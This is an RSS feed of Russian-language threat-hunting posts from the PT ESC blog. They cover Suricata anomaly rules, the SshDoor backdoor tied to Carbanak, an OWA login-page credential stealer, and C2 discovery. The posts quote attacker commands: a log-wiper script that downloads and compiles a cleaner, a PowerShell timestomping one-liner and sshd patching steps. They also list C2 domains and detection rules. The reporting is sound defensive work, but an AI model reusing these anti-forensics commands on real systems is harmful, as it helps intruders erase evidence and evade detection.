<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>hunt &#8211; PT ESC</title>
	<atom:link href="/tag/hunt/feed/index.xml" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description></description>
	<lastBuildDate>Wed, 30 Sep 2026 19:22:09 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.3</generator>

<image>
	<url>/wp-content/uploads/2026/09/cropped-cropped-large_icon-32x32.png</url>
	<title>hunt &#8211; PT ESC</title>
	<link>/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Как создать правила для сетевого трафика под будущую угрозу</title>
		<link>/how-to-create-rules-for-network-traffic-for-a-future-threat/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Fri, 26 Sep 2025 16:03:27 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[hunt]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[rules]]></category>
		<category><![CDATA[suricata]]></category>
		<guid isPermaLink="false">/%d0%ba%d0%b0%d0%ba-%d1%81%d0%be%d0%b7%d0%b4%d0%b0%d1%82%d1%8c-%d0%bf%d1%80%d0%b0%d0%b2%d0%b8%d0%bb%d0%b0-%d0%b4%d0%bb%d1%8f-%d1%81%d0%b5%d1%82%d0%b5%d0%b2%d0%be%d0%b3%d0%be-%d1%82%d1%80%d0%b0%d1%84/</guid>

					<description><![CDATA[Как создать правила для сетевого трафика под будущую угрозу 🤨 Об этом на этой неделе в Китае во время третьего саммита по кибербезопасности, в рамках которого прошла шестая международная антивирусная конференция, рассказала…]]></description>
										<content:encoded><![CDATA[<p><strong>Как создать правила для сетевого трафика под будущую угрозу </strong><strong>🤨</strong></p>
<p>Об этом на этой неделе в Китае во время третьего саммита по кибербезопасности, в рамках которого прошла шестая международная антивирусная конференция, <a href="https://t.me/Positive_Technologies/3790" rel="noopener" target="_blank">рассказала</a> <strong>Ксения Наумова</strong>, старший специалист отдела сетевой экспертизы антивирусной лаборатории PT ESC. В канале делимся подробностями из доклада 🍸</p>
<p>Достаточно значимая часть работы аналитика сетевого трафика при анализе вредоносного ПО заключается в написании детектирующей сигнатурной логики для обнаружения конкретных образцов ВПО в сетевом трафике. </p>
<p>Экзактовые сигнатуры обладают одним несомненным преимуществом — они ловят ровно те вредоносные образцы, на которые были написаны, но это же является их главной слабостью: при даже небольшом изменении какого-либо компонента сетевого взаимодействия правила перестают срабатывать.</p>
<p>Мы решили, что этот недуг можно смело обернуть в преимущество: сигнатуры могут ловить не только экзактовые вредоносы, но и аномальное поведение, которое эти образцы порождают.</p>
<p><strong>Что может являться интересующей нас аномалией?</strong></p>
<p>➡️ Необычные размеры пакетов;<br />
➡️ неизвестные протоколы;<br />
➡️ подозрительные DNS-запросы / подозрительные TLD в DNS;<br />
➡️ скачки трафика / задержки;<br />
➡️ нарушения RFC;<br />
➡️ применение обфускации, кодирования, шифрования;<br />
➡️ и многое другое…</p>
<p>Мы провели небольшой анализ существующих правил на детектирование аномалий в наборе опенсорсных сигнатур Emerging Threats — HUNTING (<em>скриншот 1</em>):</p>
<p>➡️ ~510 правил на XOR-шифрование HTTP-запросов;<br />
➡️ ~50 правил на кодированные в Base64 данные;<br />
➡️ ~50 правил на подозрительные TLD в DNS;<br />
➡️ правила на содержимое в ZIP, эксфильтрацию и т. п.</p>
<p><strong>Показательный пример удачного hunting-правила:</strong></p>
<pre><code>alert http $HOME_NET any -&gt; $EXTERNAL_NET any (sid: 2027117; msg:&quot;ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration&quot;; flow:established,to_server; http.method; content:&quot;POST&quot;; http.request_body; content:&quot;csrss.exe&quot;; content:&quot;explorer.exe&quot;; fast_pattern; content:&quot;svchost.exe&quot;; content:&quot;lsass.exe&quot;; ...)
</code></pre>
<p>А на <em>скриншоте 2</em> — пример такого подозрительного трафика.</p>
<p>Однако искать аномалии можно не только с помощью открытых правил, но и самостоятельно — например, нарушения RFC, конкретно RFC 2616, определяющего протокол HTTP (<em>скриншот 3</em>). Можно поискать HTTP-запросы, у которых заголовок Referer не содержит схему:</p>
<pre><code>alert http any any -&gt; any any (msg: &quot;SUSPICIOUS [PTsecurity] HTTP header Referer RFC2616 violation&quot;; flow: established, to_server; content: &quot;Referer|3a|&quot;; http_header; content: !&quot;Referer|3a 20|http&quot;; http_header; ...)
</code></pre>
<p>В наши сети попадал бэкдор <code>EAGERBEE</code> и другие интересные образцы (<em>скриншот 4</em>).</p>
<p>Или, например, можно поискать простую команду <code>PING</code> внутри <code>GZIP</code> (<em>скриншот 5</em>):</p>
<pre><code>alert tcp any any -&gt; any any (msg: &quot;SUSPICIOUS [PTsecurity] Generic Ping command inside Gzip&quot;; flow: established, to_server; content: &quot;|1f 8b 08 00 00 00 00 00 04 00 0b c8 cc 4b 07 00 c3 92 e7 85 04 00 00 00|&quot;; ...)
</code></pre>
<p>По итогам срабатываний и дальнейших исследований к нам попадали <code>SheetRAT</code> и <code>zgRAT</code> (<em>скриншот 6</em>).</p>
<p>Но основная мысль, зафиксированная в докладе, — в использовании корреляции их сработок. Корреляция сработок — понятие не новое, но в контексте сетевого трафика его пока применяют крайне редко; иногда уходят в более сложные реализации защиты и забывают о простых, но действенных подходах.</p>
<p><strong>🫵 Выводы простые:</strong> generic-правила, особенно в корреляции друг с другом, могут значительно помогать в детектировании как давно известных, так и абсолютно новых угроз, о которых пока никто не знает. Можно пользоваться открытыми наборами сетевых сигнатур — ET Open, <a href="https://rules.ptsecurity.com/" rel="noopener" target="_blank">PT Open</a>, а можно смело писать свои.</p>
<p>Happy hunting!</p>
<figure class="wp-block-image"><img width="1024" height="590" src="/wp-content/uploads/2025/09/photo_382@26-09-2025_16-03-27-1024x590.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/09/photo_382@26-09-2025_16-03-27-1024x590.jpg 1024w, /wp-content/uploads/2025/09/photo_382@26-09-2025_16-03-27-300x173.jpg 300w, /wp-content/uploads/2025/09/photo_382@26-09-2025_16-03-27-768x443.jpg 768w, /wp-content/uploads/2025/09/photo_382@26-09-2025_16-03-27.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="590" src="/wp-content/uploads/2025/09/photo_383@26-09-2025_16-03-28-1024x590.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/09/photo_383@26-09-2025_16-03-28-1024x590.jpg 1024w, /wp-content/uploads/2025/09/photo_383@26-09-2025_16-03-28-300x173.jpg 300w, /wp-content/uploads/2025/09/photo_383@26-09-2025_16-03-28-768x443.jpg 768w, /wp-content/uploads/2025/09/photo_383@26-09-2025_16-03-28.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="590" src="/wp-content/uploads/2025/09/photo_384@26-09-2025_16-03-28-1024x590.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/09/photo_384@26-09-2025_16-03-28-1024x590.jpg 1024w, /wp-content/uploads/2025/09/photo_384@26-09-2025_16-03-28-300x173.jpg 300w, /wp-content/uploads/2025/09/photo_384@26-09-2025_16-03-28-768x443.jpg 768w, /wp-content/uploads/2025/09/photo_384@26-09-2025_16-03-28.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="590" src="/wp-content/uploads/2025/09/photo_385@26-09-2025_16-03-28-1024x590.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/09/photo_385@26-09-2025_16-03-28-1024x590.jpg 1024w, /wp-content/uploads/2025/09/photo_385@26-09-2025_16-03-28-300x173.jpg 300w, /wp-content/uploads/2025/09/photo_385@26-09-2025_16-03-28-768x443.jpg 768w, /wp-content/uploads/2025/09/photo_385@26-09-2025_16-03-28.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="590" src="/wp-content/uploads/2025/09/photo_386@26-09-2025_16-03-28-1024x590.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/09/photo_386@26-09-2025_16-03-28-1024x590.jpg 1024w, /wp-content/uploads/2025/09/photo_386@26-09-2025_16-03-28-300x173.jpg 300w, /wp-content/uploads/2025/09/photo_386@26-09-2025_16-03-28-768x443.jpg 768w, /wp-content/uploads/2025/09/photo_386@26-09-2025_16-03-28.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#suricata</span> <span class="hashtag">#network</span> <span class="hashtag">#signature</span> <span class="hashtag">#rules</span> <span class="hashtag">#hunt</span> <span class="hashtag">#detect</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>(Ex)Cobalt == (Ex)Carbanak</title>
		<link>/excobalt-excarbanak/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Mon, 21 Apr 2025 12:26:07 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[hunt]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[TI]]></category>
		<category><![CDATA[unix]]></category>
		<category><![CDATA[yara]]></category>
		<guid isPermaLink="false">http://localhost:8080/excobalt-excarbanak/</guid>

					<description><![CDATA[(Ex)Cobalt == (Ex)Carbanak 🤔 С начала 2025 года команда PT ESC отмечает рост числа атак с применением бэкдора SshDoor. В центре внимания подобных атак часто оказываются российские государственные учреждения. Получив доступ к…]]></description>
										<content:encoded><![CDATA[<strong>(Ex)Cobalt == (Ex)Carbanak</strong> 🤔<br />
<br />
С начала 2025 года команда <strong>PT ESC</strong> отмечает рост числа атак с применением бэкдора <code>SshDoor</code>. В центре внимания подобных атак часто оказываются российские государственные учреждения.<br />
<br />
Получив доступ к узлам жертв, атакующие запускают sh-скрипт <code>Release.gz</code> (<em>скриншот 1</em>), который помимо прочего скачивает зашифрованный <code>OpenSSL</code> файл <code>main.jpg</code> (<em>скриншот 2</em>).<br />
<br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">file ./main.jpg
./main.jpg: openssl enc'd data with salted password
</code></span></pre><br />
<br />
Команда для расшифровки файла:<br />
<br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">openssl aes-256-cbc -md sha256 -d -in $ARCHIVE_NAME -out tmp.tar.gz -k $ZIP_PASS
</code></span></pre><br />
<br />
Затем на скомпрометированном узле компилируется патченный <code>sshd</code> и перезапускается сервис <code>sshd</code>.<br />
<br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">...
make -j4&gt;&gt; /dev/null &amp;&amp; 
strip ssh sshd &amp;&amp;
make install
...
service sshd restart
</code></span></pre><br />
<br />
Патченный <code>sshd</code> (<em>скриншот 3</em>) имеет ряд сходств с бэкдором <code>SshDoor</code>, который описывали в материалах <a href="https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/" rel="noopener" target="_blank">Linux/SSHDoor.A Backdoored SSH daemon that steals passwords </a>(2013 года) и <a href="https://archive.orkl.eu/3b669818816e3d888b2546bc75ac0f44782f7faf.pdf" rel="noopener" target="_blank">Inside the Response of a Unique CARBANAK Intrusion</a> (2017 года).<br />
<br />
В целом функциональность обнаруженного нами <code>SshDoor</code> значительных изменений не претерпела. Бэкдор позволяет злоумышленнику получить скрытый доступ на скомпрометированный сервер по протоколу SSH c ключом или паролем, заданным в конфигурационном файле либо в коде самого бэкдора. Также бэкдор собирает и отправляет на удаленный сервер аутентификационные данные пользователей.<br />
<br />
В материале <code>Inside the Response of a Unique CARBANAK Intrusion</code> данный образец исследователи связывали с APT-группой <code>Carbanak</code>, которая <a href="https://securelist.ru/bolshoe-bankovskoe-ograblenie-apt-kampaniya-carbanak/25106/" rel="noopener" target="_blank">успешно атаковала банковские организации в 2015 году</a>.<br />
<br />
Также в арсенал атакующей группы входит утилита <code>A D V A N C E D  L O G W I P E R (ALW)</code> (<em>скриншот 4</em>), которая компилируется на узле жертвы и удаляет из ряда журналов <code>/var/log/*</code> (<em>скриншот 5</em>) все записи, которые содержат IP-адрес атакующих (<code>$YOUR_IP</code>).<br />
<br />
<pre class="wp-block-code"><span><code lang="bash" class="hljs language-bash language-bash"><span class="hljs-comment">#------------------------Clean logs-------------------------------------</span>
<span class="hljs-keyword">if</span> <span class="hljs-built_in">which</span> gcc &gt;/dev/null 2&gt;&amp;1 ; <span class="hljs-keyword">then</span>
    <span class="hljs-variable">$DOWNLOADER</span> <span class="hljs-variable">$LOG_CLEANER</span>; gcc log.c -o <span class="hljs-built_in">log</span>; ./<span class="hljs-built_in">log</span> -h <span class="hljs-variable">$YOUR_IP</span>;rm -f <span class="hljs-built_in">log</span> log.c;
<span class="hljs-keyword">else</span>
    PACKET_MANAGER=<span class="hljs-variable">$PACKET_MANAGER</span><span class="hljs-string">" gcc"</span>;
    <span class="hljs-variable">$PACKET_MANAGER</span> &amp;&amp; <span class="hljs-variable">$DOWNLOADER</span> <span class="hljs-variable">$LOG_CLEANER</span>; gcc log.c -o <span class="hljs-built_in">log</span>; ./<span class="hljs-built_in">log</span> -h <span class="hljs-variable">$YOUR_IP</span>;rm -f <span class="hljs-built_in">log</span> log.c;
<span class="hljs-keyword">fi</span>
</code></span></pre><br />
<br />
Примечательно, что команда <code>RSA Global Incident Response</code> в своем материале относит <code>ALW</code> также к деятельности группы <code>Carbanak</code>.<br />
<br />
<strong>Файлы конфигурации:</strong><br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">/var/run/.options
/dev/shm/.options
</code></span></pre><br />
<br />
<strong>C2:</strong><br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">cdn2-os.pythonupdate.com
centos.pythonupdate.com
pkg.pkg-pfsense.org
</code></span></pre><br />
<br />
<strong>MD5:</strong><br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">016bd8119efd5fae482131464ff1dfde
eec5d0c3fc2b1b1074c3648e26d1fe08
0689b1e75241f93b43cd2af0c2f10217
</code></span></pre><br />
<br />
<strong>YARA:</strong><br />
<pre class="wp-block-code"><span><code lang="powershell" class="hljs language-powershell language-powershell">rule SshDoor {
    strings:
        <span class="hljs-variable">$spy1</span> = <span class="hljs-string">"SPY_PATH"</span>
        <span class="hljs-variable">$spy2</span> = <span class="hljs-string">"SPY_PORT"</span>
        <span class="hljs-variable">$spy3</span> = <span class="hljs-string">"SPY_HOST"</span>
        <span class="hljs-variable">$spy4</span> = <span class="hljs-string">"spy_passwd"</span>
        <span class="hljs-variable">$spy5</span> = <span class="hljs-string">"spy_master"</span>
        <span class="hljs-variable">$spy6</span> = <span class="hljs-string">"spy_bc_addr"</span>
        <span class="hljs-variable">$spy7</span> = <span class="hljs-string">"spy_buff"</span>
        <span class="hljs-variable">$spy8</span> = <span class="hljs-string">"spy_addr"</span>
        <span class="hljs-variable">$spy9</span> = <span class="hljs-string">"spy_buff_port"</span>
        <span class="hljs-variable">$sshd</span> = <span class="hljs-string">"usage: sshd"</span>
    condition:
        uint32be(<span class="hljs-number">0</span>) == <span class="hljs-number">0</span>x7f454c46 and <span class="hljs-variable">$sshd</span> and (any of (<span class="hljs-variable">$spy</span>*))
}
</code></span></pre><br />
<br />
<strong>Happy hunting!</strong>

<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2025/04/photo_276@21-04-2025_12-26-07-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/04/photo_276@21-04-2025_12-26-07-1024x1024.jpg 1024w, /wp-content/uploads/2025/04/photo_276@21-04-2025_12-26-07-300x300.jpg 300w, /wp-content/uploads/2025/04/photo_276@21-04-2025_12-26-07-150x150.jpg 150w, /wp-content/uploads/2025/04/photo_276@21-04-2025_12-26-07-768x769.jpg 768w, /wp-content/uploads/2025/04/photo_276@21-04-2025_12-26-07.jpg 1279w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="809" height="1024" src="/wp-content/uploads/2025/04/photo_277@21-04-2025_12-26-07-809x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/04/photo_277@21-04-2025_12-26-07-809x1024.jpg 809w, /wp-content/uploads/2025/04/photo_277@21-04-2025_12-26-07-237x300.jpg 237w, /wp-content/uploads/2025/04/photo_277@21-04-2025_12-26-07-768x972.jpg 768w, /wp-content/uploads/2025/04/photo_277@21-04-2025_12-26-07.jpg 1011w" sizes="auto, (max-width: 809px) 100vw, 809px" /></figure>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2025/04/photo_278@21-04-2025_12-26-07-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/04/photo_278@21-04-2025_12-26-07-1024x1024.jpg 1024w, /wp-content/uploads/2025/04/photo_278@21-04-2025_12-26-07-300x300.jpg 300w, /wp-content/uploads/2025/04/photo_278@21-04-2025_12-26-07-150x150.jpg 150w, /wp-content/uploads/2025/04/photo_278@21-04-2025_12-26-07-768x769.jpg 768w, /wp-content/uploads/2025/04/photo_278@21-04-2025_12-26-07.jpg 1279w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2025/04/photo_279@21-04-2025_12-26-07-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/04/photo_279@21-04-2025_12-26-07-1024x1024.jpg 1024w, /wp-content/uploads/2025/04/photo_279@21-04-2025_12-26-07-300x300.jpg 300w, /wp-content/uploads/2025/04/photo_279@21-04-2025_12-26-07-150x150.jpg 150w, /wp-content/uploads/2025/04/photo_279@21-04-2025_12-26-07-768x769.jpg 768w, /wp-content/uploads/2025/04/photo_279@21-04-2025_12-26-07.jpg 1279w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>

<br />
<br />
<span class="hashtag">#hunt</span> <span class="hashtag">#ti</span> <span class="hashtag">#ioc</span> <span class="hashtag">#yara</span> <span class="hashtag">#dfir</span> <span class="hashtag">#detect</span> <span class="hashtag">#unix</span> <span class="hashtag">#apt</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Сложный пароль не поможет</title>
		<link>/a-complex-password-wont-help/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Mon, 17 Mar 2025 15:01:05 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[hunt]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[win]]></category>
		<category><![CDATA[yara]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d1%81%d0%bb%d0%be%d0%b6%d0%bd%d1%8b%d0%b9-%d0%bf%d0%b0%d1%80%d0%be%d0%bb%d1%8c-%d0%bd%d0%b5-%d0%bf%d0%be%d0%bc%d0%be%d0%b6%d0%b5%d1%82/</guid>

					<description><![CDATA[Сложный пароль не поможет 📮 Практика команды реагирования на инциденты информационной безопасности PT ESC IR показывает, что злоумышленники, получая доступ в инфраструктуру компаний, помимо классических бэкдоров и туннелей, иногда встраивают на почтовом…]]></description>
										<content:encoded><![CDATA[<strong>Сложный пароль не поможет</strong> 📮<br />
<br />
Практика команды реагирования на инциденты информационной безопасности PT ESC IR показывает, что злоумышленники, получая доступ в инфраструктуру компаний, помимо классических бэкдоров и туннелей, иногда встраивают на почтовом сервере дополнительные стилеры учетных записей. Про аналогичное ВПО мы уже <a href="https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/ehksperty-positive-technologies-obnaruzhili-seriyu-atak-cherez-microsoft-exchange-server/?utm_source=tg_escalator&#038;utm_medium=mail&#038;utm_campaign=14_03" rel="noopener" target="_blank">рассказывали</a> в прошлом году.<br />
<br />
Например, в ходе атаки злоумышленники могут получить доступ к почтовому серверу Microsoft Exchange Server и отредактировать файл <code>C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\XX.X.XXXX\scripts\premium\flogon.js</code>, который является inline-скриптом для главной страницы аутентификации <code>logon.aspx</code> на OWA (Outlook Web Access).<br />
<br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">&lt;%= InlineJavascript("flogon.js") %&gt;
</code></span></pre><br />
<br />
Атакующие обычно используют базовые методы антифорензики, подменяя временные метки модифицированным файлам.<br />
<br />
<pre class="wp-block-code"><span><code lang="powershell" class="hljs language-powershell language-powershell"><span class="hljs-variable">$path</span>=<span class="hljs-string">".\flogon.js"</span>;<span class="hljs-variable">$time</span> = <span class="hljs-string">"2020-01-02 07:24:31"</span>;(<span class="hljs-built_in">Get-Item</span> <span class="hljs-variable">$path</span>).LastWriteTime = <span class="hljs-variable">$time</span>;(<span class="hljs-built_in">Get-Item</span> <span class="hljs-variable">$path</span>).CreationTime = <span class="hljs-variable">$time</span>;(<span class="hljs-built_in">Get-Item</span> <span class="hljs-variable">$path</span>).LastAccessTime = <span class="hljs-variable">$time</span>`
</code></span></pre><br />
<br />
Как правило, злоумышленники вносят изменения в функцию <code>clkLgn</code>, которая является обработчиком кнопки входа. В функцию добавляют вредоносный код, который в открытом виде перехватывает все учетные записи (логины и пароли), введенные пользователями при авторизации на OWA.<br />
<br />
<strong>Рассмотрим два актуальных примера:</strong><br />
<br />
1️⃣ В функции <code>clkLgn</code> формируется URL формата <code>https://[REDACTED]/?key1=smthuser&amp;key2=smthpassword</code>, где <code>smthuser</code> — это логин, а <code>smthpassword</code> — пароль перехваченной учетной записи, и отправляется GET-запрос на управляющий сервер (скриншоты 1, 2).<br />
<br />
2️⃣ В другом эпизоде злоумышленники предварительно добавляли на сервер дополнительный сценарий <code>check.aspx</code>, задача которого — запись перехваченных учетных данных в лог <code>log.png</code> на диске. Доступ к логу атакующие могли получать из интернета. <br />
<br />
Перехват учетных данных, как и в первом примере, осуществлялся модифицированной функцией <code>clkLgn</code>, в код которой была добавлена новая функция <code>chklogin</code>, которая, в свою очередь, вызывала <code>chk</code>, внутри которой формировался URL <code>./check.aspx?c=&quot;smthuser-smthpassword</code> с перехваченными учетными данными в параметре «c» и выполнялся GET-запрос в скрипт <code>check.aspx</code> (скриншоты 3, 4).<br />
<br />
👀 Пример журнала <code>log.png</code>:<br />
<br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">smthuser-
smthpassword#20250304090723
</code></span></pre><br />
<br />
<strong>YARA:</strong><br />
<br />
<pre class="wp-block-code"><span><code lang="powershell" class="hljs language-powershell language-powershell">rule PTESC_tool_win_ZZ_clkLgnStealer__Stealer{
  strings:
    <span class="hljs-variable">$s1</span> = <span class="hljs-string">"//  flogon.js"</span> 
    <span class="hljs-variable">$s2</span> = <span class="hljs-string">"(\"</span>username\<span class="hljs-string">").value"</span>
    <span class="hljs-variable">$s3</span> = <span class="hljs-string">"(\"</span>password\<span class="hljs-string">").value"</span>
    <span class="hljs-variable">$s4</span> = <span class="hljs-string">"function clkLgn()"</span> 
    <span class="hljs-variable">$s5</span> = <span class="hljs-string">".send()"</span> 
  condition:
    all of them and filesize &lt; <span class="hljs-number">20</span>KB
}
</code></span></pre><br />
<br />
<strong>Happy hunting!</strong>

<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2025/03/photo_231@17-03-2025_15-01-06-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/03/photo_231@17-03-2025_15-01-06-1024x1024.jpg 1024w, /wp-content/uploads/2025/03/photo_231@17-03-2025_15-01-06-300x300.jpg 300w, /wp-content/uploads/2025/03/photo_231@17-03-2025_15-01-06-150x150.jpg 150w, /wp-content/uploads/2025/03/photo_231@17-03-2025_15-01-06-768x767.jpg 768w, /wp-content/uploads/2025/03/photo_231@17-03-2025_15-01-06.jpg 1199w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2025/03/photo_232@17-03-2025_15-01-06-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/03/photo_232@17-03-2025_15-01-06-1024x1024.jpg 1024w, /wp-content/uploads/2025/03/photo_232@17-03-2025_15-01-06-300x300.jpg 300w, /wp-content/uploads/2025/03/photo_232@17-03-2025_15-01-06-150x150.jpg 150w, /wp-content/uploads/2025/03/photo_232@17-03-2025_15-01-06-768x767.jpg 768w, /wp-content/uploads/2025/03/photo_232@17-03-2025_15-01-06.jpg 1199w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2025/03/photo_233@17-03-2025_15-01-06-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/03/photo_233@17-03-2025_15-01-06-1024x1024.jpg 1024w, /wp-content/uploads/2025/03/photo_233@17-03-2025_15-01-06-300x300.jpg 300w, /wp-content/uploads/2025/03/photo_233@17-03-2025_15-01-06-150x150.jpg 150w, /wp-content/uploads/2025/03/photo_233@17-03-2025_15-01-06-768x767.jpg 768w, /wp-content/uploads/2025/03/photo_233@17-03-2025_15-01-06.jpg 1199w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>

<br />
<br />
<span class="hashtag">#ir</span> <span class="hashtag">#hunt</span> <span class="hashtag">#yara</span> <span class="hashtag">#dfir</span> <span class="hashtag">#detect</span> <span class="hashtag">#win</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>C2 hunting: часть 2.</title>
		<link>/c2-hunting-part-2/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Mon, 17 Feb 2025 16:33:55 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[C2]]></category>
		<category><![CDATA[hunt]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[TI]]></category>
		<category><![CDATA[tips]]></category>
		<guid isPermaLink="false">http://localhost:8080/c2-hunting-%d1%87%d0%b0%d1%81%d1%82%d1%8c-2/</guid>

					<description><![CDATA[C2 hunting: часть 2. Ищем серверы хакеров по внешним признакам 😁 В предыдущей части мы с вами поговорили о том, как расширить знание об инфраструктуре хакеров, используя PDNS и Whois. Сегодня обсудим,…]]></description>
										<content:encoded><![CDATA[<p><strong>C2 hunting: часть 2. </strong>Ищем серверы хакеров по внешним признакам 😁</p>
<p>В <a href="https://t.me/ptescalator/78" rel="noopener" target="_blank">предыдущей части</a> мы с вами поговорили о том, как расширить знание об инфраструктуре хакеров, используя PDNS и Whois.</p>
<p>Сегодня обсудим, как искать серверы хакеров не только когда они уже начали использовать свою инфраструктуру в атаках, но и в момент ее развертывания.</p>
<p>Перед самой атакой хакеры, как правило, занимаются подготовкой инструментария и сетевой инфраструктуры. В моделях угроз этот этап обычно называется <a href="https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html" rel="noopener" target="_blank">weaponization</a> или <a href="https://attack.mitre.org/tactics/TA0042/" rel="noopener" target="_blank">resource development.</a></p>
<p>Практически у любого ВПО в том или ином виде есть механизм коммуникации с C2. Сам C2 обладает рядом признаков, которые могут быть получены, если его просканировать или просто обратиться на конкретный порт, например 443. Так мы, скорее всего, получим параметры TLS-сертификата, параметры TLS-соединения, заголовки ответа сервера и содержимое веб-страницы. </p>
<p>Соответственно, разбирая ВПО хакеров и анализируя их сетевую инфраструктуру, мы будем иметь представление об уникальных признаках, которые они используют на своих C2 для конкретного ВПО, что позволит нам в некоторых случаях обнаруживать их C2 в момент развертывания сетевой инфраструктуры для атаки и превентивно блокировать эти индикаторы на СЗИ.</p>
<p><strong>Список наиболее популярных признаков, которые можно использовать для идентификации С2:</strong></p>
<p>✅ Параметры TLS-сертификата<br />
✅ Параметры TLS-соединения (JA3, JA4, JARM и т. д.)<br />
✅ Заголовки ответа от сервера<br />
✅ Контент и title страницы<br />
✅ Набор открытых портов<br />
✅ Favicon</p>
<p>Ограничить поиск всегда можно с помощью указания ASN, хостера или страны.</p>
<p><strong>Список сервисов, которые помогут вам искать С2 таким способом:</strong></p>
<p>✅ Shodan<br />
✅ Censys<br />
✅ FOFA<br />
✅ ZoomEye<br />
✅ BinaryEdge<br />
✅ Netlas<br />
✅ ONYPHE<br />
